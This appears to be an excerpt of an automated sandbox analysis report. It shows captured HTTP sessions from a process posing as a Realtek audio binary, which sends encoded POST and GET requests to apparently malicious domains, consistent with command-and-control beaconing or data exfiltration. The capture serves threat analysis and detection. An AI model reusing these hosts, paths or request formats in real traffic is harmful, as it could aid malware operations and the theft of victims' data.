                                                                                Nov 25, 2024 11:58:14.713673115 CET1289INData Raw: 03 bb 10 05 a2 9e d1 7b d8 49 1c 9b e3 90 26 e9 99 7c 86 9d 94 34 73 17 0a 14 3d b9 a7 50 4a 10 bb 93 b0 93 1f 4c fe 41 9a 0d cf eb 1a 14 5a f2 6c 5e c1 4e ce 32 da e1 69 8a 9e cb 17 d8 49 4b 43 37 a0 48 d3 f3 79 00 bb 15 37 a3 f1 9f 21 ea b9 ec
                                                                                Data Ascii: {I&|4s=PJLAZl^N2iIKC7Hy7!=7T=":M5D.P}))&{>g6my6+~)fI%iz}&]I_ MiII3@;d/Le4=I&}3w+nF>C
                                                                                Nov 25, 2024 11:58:14.713984013 CET1289INData Raw: ee 7a 30 33 bc 72 96 7f 57 55 2d 58 6e 56 d7 7e b5 3c fc 69 47 c5 cd ba b4 da bb aa 6a 9b 35 ce 0a a5 75 be af aa f3 bb 0b de 5b 49 0d 51 e8 7e ae 73 6f ed df 67 63 b9 96 cf df b9 df 5f b6 d1 4a ec d5 ec 34 97 9d c5 52 2e 76 7a ce 12 f2 f3 9a e5
                                                                                Data Ascii: z03rWU-XnV~<iGj5u[IQ~sogc_J4R.vzX80i}w-iR?3RinNj<P@8#3/0J5b_N}<Sl;'QmhHffeziblr 8Jonzs)F6e0HJ\A
                                                                                Nov 25, 2024 11:58:14.713996887 CET1289INData Raw: ad 08 ff 90 e6 5a 1a fa 73 9a 6b 95 bd 74 18 73 ed 78 9d 54 01 fe 80 e6 1a 4b 17 1d df 5c 5b cd 99 cc b5 4c 3f 1e d5 5c 63 ec d2 03 98 6b 2c bd db c6 6c 01 9e ed 61 ae 1d 9b fe a7 a0 fb 93 31 d7 32 62 7b 14 73 8d ad bb f6 37 d7 58 3a ab 85 b9 56
                                                                                Data Ascii: ZsktsxTK\[L?\ck,la12b{s7X:VkO%Ck\;o2[M,j@njle*{0:5.:f0k~<Xzoh2b{{X:VkO%Ck^;o7vKl}
                                                                                Nov 25, 2024 11:58:14.714329958 CET1289INData Raw: 91 15 91 65 4f 83 63 75 0b 6a 51 ae eb 3c 84 70 98 55 c5 04 93 72 e1 2c 52 15 00 24 05 81 8d 05 6a f2 bd 75 6d ed 2e 83 ef 6b da 59 88 be 70 69 67 31 6c fc ce 42 c9 8b 8b f6 ed 0d da 9a 87 2a 69 60 ea 0f 60 5f 09 b7 ca 98 53 ce 8b 6a aa 8e 3f 3c
                                                                                Data Ascii: eOcujQ<pUr,R$jum.kYpig1lB*i``_Sj?<RA9+nKk>7Tof[R}\{Z^d6o%=Y7Y"{T%L|M_xsBfi[M7!Ro.wUf\KfQZ:W4GyKpYIDVdEyoe!
                                                                                Nov 25, 2024 11:58:14.714468956 CET1289INData Raw: 64 15 f8 37 e6 35 10 01 94 3b 51 a6 3f 80 2e 6c 3e 3f 04 39 95 86 38 6c 47 43 68 10 0c 67 00 a1 0c 90 6e 90 5e 81 b0 0b db 32 06 11 1b f3 23 2d fc 61 80 d0 8c 50 14 e9 17 ca 2a b4 55 96 51 f4 24 90 6a f8 a1 d0 0f 22 c6 fc 10 95 82 24 03 1f 04 c2
                                                                                Data Ascii: d75;Q?.l>?98lGChgn^2#-aP*UQ$j"$5Fz[EKPAFd(Z"je4hPFR0EHQ~THP#BaLQ!J~x|"?j4:Tx=<fu(Q:b<!T
                                                                                Nov 25, 2024 11:58:14.714653015 CET1289INData Raw: f0 f1 b2 58 2b a4 ef 36 5f 25 4f b8 44 08 17 47 3b 29 1f 85 9f 39 ca e5 72 b6 50 ea 64 66 ca d5 3a ca 47 95 5d be 83 f2 b2 2e 1f 35 a6 fc d9 fb bc 46 d8 4b 28 df 2d ec 9f 43 9f 3f b3 b4 7f 39 7d 5e d4 fb 91 7a be 61 d4 cd aa 08 a6 28 86 eb 86 02
                                                                                Data Ascii: X+6_%ODG;)9rPdf:G].5FK(-C?9}^za(X|//%cU;Fc0X|S:#/ADJF2E55HFp]"'3{/{YiDLhC@P3IKKnLSJ(or>6+Jb'hgJ6
                                                                                Nov 25, 2024 11:58:14.714759111 CET1289INData Raw: a1 01 f4 33 92 eb a2 58 cb 89 54 6b fb 0a 75 ae d3 f3 f6 4e a9 48 6b ac 12 5d 26 d0 4f 27 cf a1 2d 27 2a 82 42 8e ec 57 08 f4 a8 8d 40 0f 8f 2f d0 f2 98 4a 34 38 6d 20 5d 44 5c a0 b9 c4 c2 19 8d 88 32 87 bb a1 2a 8f 35 79 4a 91 ef 29 e9 a1 12 4f
                                                                                Data Ascii: 3XTkuNHk]&O'-'*BW@/J48m ]D\2*5yJ)OF9Wv&('bO]c^@e0q7<eD-^QA3]c^8ZU3OHC=|LG!,@S%Ux0P-IS-c:S@p$Ee
                                                                                Nov 25, 2024 11:58:14.929260969 CET1289INData Raw: d2 bb e5 02 1c 4e 19 42 11 48 4e 84 f3 40 d2 32 1c 02 29 6d 4b 5e 8a f3 70 32 62 1c 02 ca c9 5f 4c 55 4e 92 8b 74 a5 45 39 84 95 93 9d 10 56 41 98 f3 b0 b2 d2 1c c2 92 4b 29 cc 8b 61 1e 54 46 0a a3 29 7a 54 06 a9 28 d2 79 58 39 99 0e a1 0d 4b f9
                                                                                Data Ascii: NBHN@2)mK^p2b_LUNtE9VAK)aTF)zT(yX9K<XP;&-qeTN=^ld9VOK5.%:!#VFBND Y(YPFE(y!tIQpPrbK9+dE6#%~_sUA-iA^J 22J`GoaF


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                13192.168.11.204975431.31.196.177807484C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 25, 2024 11:58:17.213864088 CET458OUTGET /sr6d/?2WLcH=1SpMEcLzJ9Sn7Ad5q3DkRiZVN2jVBq+dlMgZT/nq/UyfSDPywFazxbh+/qzvL+EnIyZaTvIKZcPRrxMSWCBfdTtLgScf+bZOQub9cvrYC+7J/tJ5pDuOaT0=&ZQ=9w6eOuayM HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Host: www.nartex-uf.online
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Nov 25, 2024 11:58:17.449703932 CET1289INHTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Mon, 25 Nov 2024 10:58:17 GMT
                                                                                Content-Type: text/html; charset=utf-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Data Raw: 66 65 62 31 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 72 75 22 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 64 61 74 61 2d 70 61 6e 65 6c 2d 75 72 6c 3d 22 68 74 74 70 73 3a 2f 2f 73 65 72 76 65 72 31 39 34 2e 68 6f 73 74 69 6e 67 2e 72 65 67 2e 72 75 2f 6d 61 6e 61 67 65 72 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e d0 a1 d1 82 d1 80 d0 b0 d0 bd d0 b8 d1 86 d0 b0 20 d0 bd d0 b5 26 6e 62 73 70 3b d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd d0 b0 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 2f 2a 21 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a [TRUNCATED]
                                                                                Data Ascii: feb1<!doctype html><html lang="ru" class="is_adaptive" data-panel-url="https://server194.hosting.reg.ru/manager"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="robots" content="noindex"><title> &nbsp;</title><style media="all">/*!*************************************************************************************************************************************************************************************************!*\ !*** css ./node_modules/css-loader/index.js??clonedRuleSet-6.use[1]!./node_modules/postcss-loader/src/index.js!./node_modules/less-loader/dist/cjs.js!./bem/blocks.adaptive/b-page/b-page.less ***! \*************************************************************************************************************************************************************************************************/.b-page{display:flex;flex-direction:column;width:100%;min-width:320px;height:100%;padding:57p [TRUNCATED]
                                                                                Nov 25, 2024 11:58:17.449763060 CET1289INData Raw: 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 2d 77 65 62 6b 69 74 2d 74 61 70 2d 68 69 67 68 6c 69 67 68 74 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 7d 68 74 6d 6c 3a 6e 6f 74 28 2e 69 73 5f 61 64 61 70 74 69
                                                                                Data Ascii: -serif;background:#fff;-webkit-tap-highlight-color:transparent}html:not(.is_adaptive) .b-page{overflow-x:hidden}@media (min-width:1024px){.is_adaptive .b-page{overflow-x:hidden}}.b-page_type_parking{min-height:100vh}.b-page_type_error-page{pad
                                                                                Nov 25, 2024 11:58:17.449990988 CET1289INData Raw: 6f 63 6b 7d 2e 62 2d 70 61 67 65 5f 5f 66 6f 6f 74 65 72 2d 64 6f 77 6e 7b 66 6c 65 78 3a 31 20 30 20 61 75 74 6f 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 2e 69 65 20 2e 62 2d 70 61 67 65 5f 5f 66 6f 6f 74 65 72 2d 64 6f 77 6e 7b 6d 69
                                                                                Data Ascii: ock}.b-page__footer-down{flex:1 0 auto;overflow:hidden}.ie .b-page__footer-down{min-height:100%}@media (min-width:1024px){.is_adaptive .b-page__footer-down{overflow:visible}}.b-page__footer-down_overflow_visible{overflow:visible}.b-page__foote
                                                                                Nov 25, 2024 11:58:17.450054884 CET1289INData Raw: 70 78 3b 70 61 64 64 69 6e 67 3a 30 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 32 66 34 66 39 7d 68 74 6d 6c 3a 6e 6f 74 28 2e 69 73 5f 61 64 61 70 74 69 76 65 29 20 2e 62 2d 70 61 67 65 5f 5f 61 64 64 69 74 69 6f 6e 2d 77 72 61
                                                                                Data Ascii: px;padding:0;background-color:#f2f4f9}html:not(.is_adaptive) .b-page__addition-wrapper{min-width:996px}@media (min-width:1024px){.is_adaptive .b-page__addition-wrapper{min-width:996px}}.b-page__addition-title{float:left;font:700 20px/30px Inte
                                                                                Nov 25, 2024 11:58:17.450098991 CET1289INData Raw: 66 6c 6f 77 5f 76 69 73 69 62 6c 65 2c 68 74 6d 6c 3a 6e 6f 74 28 2e 69 73 5f 61 64 61 70 74 69 76 65 29 20 2e 62 2d 70 61 67 65 5f 6f 76 65 72 66 6c 6f 77 5f 76 69 73 69 62 6c 65 7b 6f 76 65 72 66 6c 6f 77 3a 76 69 73 69 62 6c 65 7d 40 6d 65 64
                                                                                Data Ascii: flow_visible,html:not(.is_adaptive) .b-page_overflow_visible{overflow:visible}@media (min-width:1024px){.is_adaptive .b-page_overflow_visible{overflow:visible}}/*!*******************************************************************************
                                                                                Nov 25, 2024 11:58:17.450226068 CET1289INData Raw: 61 20 4e 65 75 65 2c 48 65 6c 76 65 74 69 63 61 2c 46 72 65 65 53 61 6e 73 2c 73 61 6e 73 2d 73 65 72 69 66 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 36 30 70 78 7d 2e 62 2d 74 65 78 74 5f 73 69 7a 65 5f 68 75 67 65 2d 63 6f 6d 70 61 63 74 2e
                                                                                Data Ascii: a Neue,Helvetica,FreeSans,sans-serif;margin-bottom:60px}.b-text_size_huge-compact.b-text_margin_top,.b-text_size_huge.b-text_margin_top{margin-top:60px}.b-text_size_huge-compact{font:48px/54px Inter,Arial,Helvetica Neue,Helvetica,FreeSans,sans
                                                                                Nov 25, 2024 11:58:17.450481892 CET1289INData Raw: 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 48 65 6c 76 65 74 69 63 61 2c 46 72 65 65 53 61 6e 73 2c 73 61 6e 73 2d 73 65 72 69 66 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 32 34 70 78 7d 2e 62 2d 74 65 78 74 5f 73 69 7a 65 5f 6e 6f 72 6d
                                                                                Data Ascii: ,Helvetica Neue,Helvetica,FreeSans,sans-serif;margin-bottom:24px}.b-text_size_normal-compact.b-text_margin_top,.b-text_size_normal.b-text_margin_top{margin-top:24px}.b-text_size_normal-compact{font:15px/18px Inter,Arial,Helvetica Neue,Helvetic
                                                                                Nov 25, 2024 11:58:17.450541019 CET1289INData Raw: 6f 70 2e 62 2d 74 65 78 74 5f 6d 61 72 67 69 6e 5f 74 6f 70 2c 68 74 6d 6c 3a 6e 6f 74 28 2e 69 73 5f 61 64 61 70 74 69 76 65 29 20 2e 62 2d 74 65 78 74 5f 73 69 7a 65 5f 68 75 67 65 5c 40 64 65 73 6b 74 6f 70 2e 62 2d 74 65 78 74 5f 6d 61 72 67
                                                                                Data Ascii: op.b-text_margin_top,html:not(.is_adaptive) .b-text_size_huge\@desktop.b-text_margin_top{margin-top:60px}html:not(.is_adaptive) .b-text_size_huge-compact\@desktop{font:48px/54px Inter,Arial,Helvetica Neue,Helvetica,FreeSans,sans-serif;margin-b
                                                                                Nov 25, 2024 11:58:17.450773001 CET1289INData Raw: 6f 6d 3a 33 30 70 78 7d 68 74 6d 6c 3a 6e 6f 74 28 2e 69 73 5f 61 64 61 70 74 69 76 65 29 20 2e 62 2d 74 65 78 74 5f 73 69 7a 65 5f 6d 65 64 69 75 6d 2d 63 6f 6d 70 61 63 74 5c 40 64 65 73 6b 74 6f 70 2e 62 2d 74 65 78 74 5f 6d 61 72 67 69 6e 5f
                                                                                Data Ascii: om:30px}html:not(.is_adaptive) .b-text_size_medium-compact\@desktop.b-text_margin_top,html:not(.is_adaptive) .b-text_size_medium\@desktop.b-text_margin_top{margin-top:30px}html:not(.is_adaptive) .b-text_size_medium-compact\@desktop{font:20px/2
                                                                                Nov 25, 2024 11:58:17.450823069 CET1289INData Raw: 72 67 69 6e 3a 30 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 31 30 32 34 70 78 29 7b 2e 69 73 5f 61 64 61 70 74 69 76 65 20 2e 62 2d 74 65 78 74 5f 73 69 7a 65 5f 67 69 61 6e 74 5c 40 64 65 73 6b 74 6f 70 7b 66 6f 6e 74 3a 37 32 70
                                                                                Data Ascii: rgin:0}@media (min-width:1024px){.is_adaptive .b-text_size_giant\@desktop{font:72px/84px Inter,Arial,Helvetica Neue,Helvetica,FreeSans,sans-serif;margin-bottom:84px}.is_adaptive .b-text_size_giant-compact\@desktop.b-text_margin_top,.is_adaptiv
                                                                                Nov 25, 2024 11:58:17.668649912 CET1289INData Raw: 6c 61 72 67 65 5c 40 64 65 73 6b 74 6f 70 7b 66 6f 6e 74 3a 32 34 70 78 2f 33 36 70 78 20 49 6e 74 65 72 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 48 65 6c 76 65 74 69 63 61 2c 46 72 65 65 53 61 6e 73 2c 73 61 6e 73 2d 73
                                                                                Data Ascii: large\@desktop{font:24px/36px Inter,Arial,Helvetica Neue,Helvetica,FreeSans,sans-serif;margin-bottom:36px}.is_adaptive .b-text_size_large-compact\@desktop.b-text_margin_top,.is_adaptive .b-text_size_large\@desktop.b-text_margin_top{margin-top:


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                14192.168.11.2049755208.91.197.27807484C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 25, 2024 11:58:31.810784101 CET736OUTPOST /ftvk/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.614genetics.online
                                                                                Origin: http://www.614genetics.online
                                                                                Referer: http://www.614genetics.online/ftvk/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 202
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Data Raw: 32 57 4c 63 48 3d 4c 47 5a 76 57 4d 71 34 54 75 4c 66 74 45 57 78 56 50 50 79 48 6d 6f 41 64 36 34 4e 38 6f 62 74 67 58 2b 72 2b 74 5a 58 35 75 77 61 5a 4f 4b 59 70 41 61 76 38 6d 4e 4e 70 67 59 6b 35 45 37 57 33 77 5a 77 6b 49 74 44 46 33 6c 6d 67 4e 39 7a 6b 31 47 31 2b 7a 74 6e 47 38 52 67 73 39 71 65 54 70 68 76 39 33 59 51 31 53 69 65 7a 37 44 2f 77 73 56 70 6f 38 77 58 51 46 4f 54 4a 65 46 59 6b 56 69 46 46 6c 4e 46 69 36 4d 4a 30 5a 6d 58 77 63 67 77 7a 61 2b 65 6f 33 49 36 61 49 6e 55 39 62 4f 61 73 77 43 4a 71 7a 78 73 50 37 75 42 49 53 4e 74 49 32 66 54 6e 71 51 55 56 41 73 4c 71 41 3d 3d
                                                                                Data Ascii: 2WLcH=LGZvWMq4TuLftEWxVPPyHmoAd64N8obtgX+r+tZX5uwaZOKYpAav8mNNpgYk5E7W3wZwkItDF3lmgN9zk1G1+ztnG8Rgs9qeTphv93YQ1Siez7D/wsVpo8wXQFOTJeFYkViFFlNFi6MJ0ZmXwcgwza+eo3I6aInU9bOaswCJqzxsP7uBISNtI2fTnqQUVAsLqA==


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                15192.168.11.2049756208.91.197.27807484C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 25, 2024 11:58:34.468408108 CET756OUTPOST /ftvk/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.614genetics.online
                                                                                Origin: http://www.614genetics.online
                                                                                Referer: http://www.614genetics.online/ftvk/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 222
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Data Raw: 32 57 4c 63 48 3d 4c 47 5a 76 57 4d 71 34 54 75 4c 66 73 6c 6d 78 5a 4f 50 79 57 57 6f 44 52 61 34 4e 6e 59 62 70 67 58 69 72 2b 73 4e 39 36 64 55 61 5a 75 36 59 6f 42 61 76 73 32 4e 4e 6a 41 59 72 6d 55 37 52 33 77 56 34 6b 4d 74 44 46 30 5a 6d 67 49 42 7a 6b 6d 75 30 78 44 74 6c 4f 63 52 69 69 64 71 65 54 70 68 76 39 32 38 36 31 53 4b 65 7a 4c 7a 2f 69 39 56 6f 68 63 77 59 54 46 4f 54 59 75 45 52 6b 56 69 37 46 6b 52 37 69 38 51 4a 30 64 69 58 77 70 4d 2f 36 61 2b 69 77 58 49 73 63 71 4c 61 6b 76 48 6d 6d 77 47 79 6a 7a 78 6b 44 4e 6a 62 56 67 35 4a 4c 6c 44 68 6a 61 70 38 58 43 74 51 33 4e 71 61 6d 69 79 59 56 69 68 6f 46 43 6d 78 36 48 70 33 75 6a 38 3d
                                                                                Data Ascii: 2WLcH=LGZvWMq4TuLfslmxZOPyWWoDRa4NnYbpgXir+sN96dUaZu6YoBavs2NNjAYrmU7R3wV4kMtDF0ZmgIBzkmu0xDtlOcRiidqeTphv92861SKezLz/i9VohcwYTFOTYuERkVi7FkR7i8QJ0diXwpM/6a+iwXIscqLakvHmmwGyjzxkDNjbVg5JLlDhjap8XCtQ3NqamiyYVihoFCmx6Hp3uj8=


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                16192.168.11.2049757208.91.197.27807484C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 25, 2024 11:58:37.123461962 CET2440OUTPOST /ftvk/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.614genetics.online
                                                                                Origin: http://www.614genetics.online
                                                                                Referer: http://www.614genetics.online/ftvk/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 7370
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Data Raw: 32 57 4c 63 48 3d 4c 47 5a 76 57 4d 71 34 54 75 4c 66 73 6c 6d 78 5a 4f 50 79 57 57 6f 44 52 61 34 4e 6e 59 62 70 67 58 69 72 2b 73 4e 39 36 64 63 61 5a 39 79 59 75 69 79 76 76 32 4e 4e 76 67 59 2f 6d 55 37 4d 33 7a 6c 38 6b 4d 6f 32 46 78 64 6d 68 71 35 7a 7a 48 75 30 6d 7a 74 6c 43 38 52 68 73 39 72 61 54 71 5a 56 39 33 4d 36 31 53 4b 65 7a 4a 62 2f 79 63 56 6f 6a 63 77 58 51 46 4f 66 4a 65 45 35 6b 56 37 41 46 6b 56 72 69 4b 67 4a 30 39 79 58 6a 76 59 2f 6d 4b 2b 61 6c 58 4a 76 63 71 47 59 6b 76 79 64 6d 77 79 55 6a 79 35 6b 54 72 43 48 48 41 49 51 56 56 2f 78 68 5a 51 66 5a 68 31 79 2f 64 53 2b 68 77 72 32 55 6e 35 6d 4f 6a 50 38 2f 45 70 41 38 30 36 5a 39 6a 62 56 63 34 76 4b 6f 78 70 4e 51 30 51 6b 59 71 49 61 53 6d 4d 59 4e 6e 46 33 71 35 4f 67 33 6f 75 7a 2f 59 6e 77 30 78 2f 30 66 35 32 4b 46 69 54 68 36 4c 66 6c 39 54 51 61 76 77 70 45 73 55 74 6d 62 78 79 44 43 55 76 4e 46 46 74 43 49 56 4a 47 2b 4f 39 4f 62 6f 75 57 6f 30 48 78 46 51 39 63 71 65 46 45 36 79 74 41 50 62 6e 4a 4f 58 32 68 [TRUNCATED]
                                                                                Data Ascii: 2WLcH=LGZvWMq4TuLfslmxZOPyWWoDRa4NnYbpgXir+sN96dcaZ9yYuiyvv2NNvgY/mU7M3zl8kMo2Fxdmhq5zzHu0mztlC8Rhs9raTqZV93M61SKezJb/ycVojcwXQFOfJeE5kV7AFkVriKgJ09yXjvY/mK+alXJvcqGYkvydmwyUjy5kTrCHHAIQVV/xhZQfZh1y/dS+hwr2Un5mOjP8/EpA806Z9jbVc4vKoxpNQ0QkYqIaSmMYNnF3q5Og3ouz/Ynw0x/0f52KFiTh6Lfl9TQavwpEsUtmbxyDCUvNFFtCIVJG+O9ObouWo0HxFQ9cqeFE6ytAPbnJOX2h9d0vFAMw/A9thUtqdoRTm7O8L5e23GSvuWQzbEOAmhu+yvvCXztQnrLnu5yJJCCjOExn4HZ8bF7Umr0BnjfvMBYCwyY1RMUmCRCTwglqa5X6nb8YtycoWWEG7YD/cAOtTB+y+agGOct5TeOD+Tmu9FOjEpG1GWdCtfOrrVGbY8c5frhxlS0pFm3f6HYR0K8pTk9AIEHmPAlViRSpl8rpqgC8ZeUZ2rM8b2XoFshUva986Lxs3jxzjySiVIMpNg8AlpoPb/rI6WhZRUkHHPE8EUyuJC188Lwib/LMYgDMfoNmBMSZNIHkvuOBSvyYo9LZ6+a7a6pkSmM0m19oHitJZfg+pINQgHfGEZrbBua/xFRxbt8NZhE8kcJ5O7b+TaC6lL/zDBOeK7/KOUPlp5SPG5JJhrJ7I0TOXv8EvSXOQBsVh4HgAfn3LUgn2aW3LB3K64z74aCSoM3s5+S+Gx0PuRi2r5PryZ4fa6hD7I3fkRyF3r7WthT4exY6XwT9NJPjSX/9lPKodmTlk8caqw9sAfPOzQGEXLpLgUsv8+dDuzFvJj2rRm9JWDZ2KcEl1mGMdFc+r6gR/2W9LPI8aMohAL+wiVmQQsH77tumuo99MEboQlp1+tZ5HIj+JnRcBU8d80H+LrlNKyzV91+nlELlEeKku+VSECsLOZ [TRUNCATED]
                                                                                Nov 25, 2024 11:58:37.123485088 CET1220OUTData Raw: 47 68 6b 66 70 67 43 6d 52 66 2f 6a 54 45 67 58 33 56 39 58 62 43 4b 58 47 4f 73 58 6d 57 58 59 72 45 4d 2f 70 37 5a 52 46 62 38 74 62 62 4f 6d 41 61 76 70 66 55 50 70 79 4d 62 30 44 33 49 63 56 38 6b 49 34 4e 62 75 52 6f 4c 76 4e 70 6d 38 45 37
                                                                                Data Ascii: GhkfpgCmRf/jTEgX3V9XbCKXGOsXmWXYrEM/p7ZRFb8tbbOmAavpfUPpyMb0D3IcV8kI4NbuRoLvNpm8E70Lu3fvlTgs5bRdqK9B8fLzjcoI7fXuXJUJrR9o9g9pUyPpCgwdt9JKhQ3dKkcFBOI2k7CHQIxtHdG7vpWeMEjmM7ItS9A63LU3vUddqCf+Vilz3G4FjrxOO3DYosLrT27/lJEHIyb50ie8hCOJvxZGDbNOm39uibh
                                                                                Nov 25, 2024 11:58:37.123563051 CET4245OUTData Raw: 67 2f 4f 49 6d 73 4d 5a 54 79 48 66 48 53 74 65 4a 42 45 72 79 73 42 4b 59 43 74 36 32 63 63 45 4f 67 42 63 53 4b 65 45 38 50 7a 6a 4a 52 6f 77 7a 47 6d 73 2f 65 4e 42 34 69 4f 75 4e 67 43 51 49 52 59 39 4b 2f 66 47 70 6a 76 7a 76 4e 77 58 6a 46
                                                                                Data Ascii: g/OImsMZTyHfHSteJBErysBKYCt62ccEOgBcSKeE8PzjJRowzGms/eNB4iOuNgCQIRY9K/fGpjvzvNwXjF2ce90licAHE9pZUU3/cXuygq73vq1oDYFG7Hf8zDYiJhxRmr23hkxVMVuCbjH8VUPP3xC+eN3aueWjklGD/j0evW2bidgnUR778lAXsbvCDv2gWBQns37gOWwBl+/BrZ9c8lBDg3S5cqFLXdUdLylLtwnZUiNceOg


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                17192.168.11.2049758208.91.197.27807484C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 25, 2024 11:58:39.778230906 CET460OUTGET /ftvk/?2WLcH=GExPV6KtXOXigkukfMfleD4xRaYqvrj5rkn1yqQr0MAVEMidlCaC83oYsDNl6Uf72gZXo4lyCEReg4R57wnVyD0gHtEFldueDrd90mwd3SDfs8vpytBw7tE=&ZQ=9w6eOuayM HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Host: www.614genetics.online
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Nov 25, 2024 11:58:40.408185005 CET993INHTTP/1.1 200 OK
                                                                                Date: Mon, 25 Nov 2024 10:58:39 GMT
                                                                                Server: Apache
                                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                                Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                Set-Cookie: vsid=901vr480077920113263890; expires=Sat, 24-Nov-2029 10:58:40 GMT; Max-Age=157680000; path=/; domain=www.614genetics.online; HttpOnly
                                                                                X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_nliGpZw9a+vIqQk4n24drIRSfnz0jpEWksgVyLyIjzGopdQ5VVlFzjjVjvjFilVa/OyByJmE9jiTLbFFlBmNAg==
                                                                                Content-Length: 2630
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Connection: close
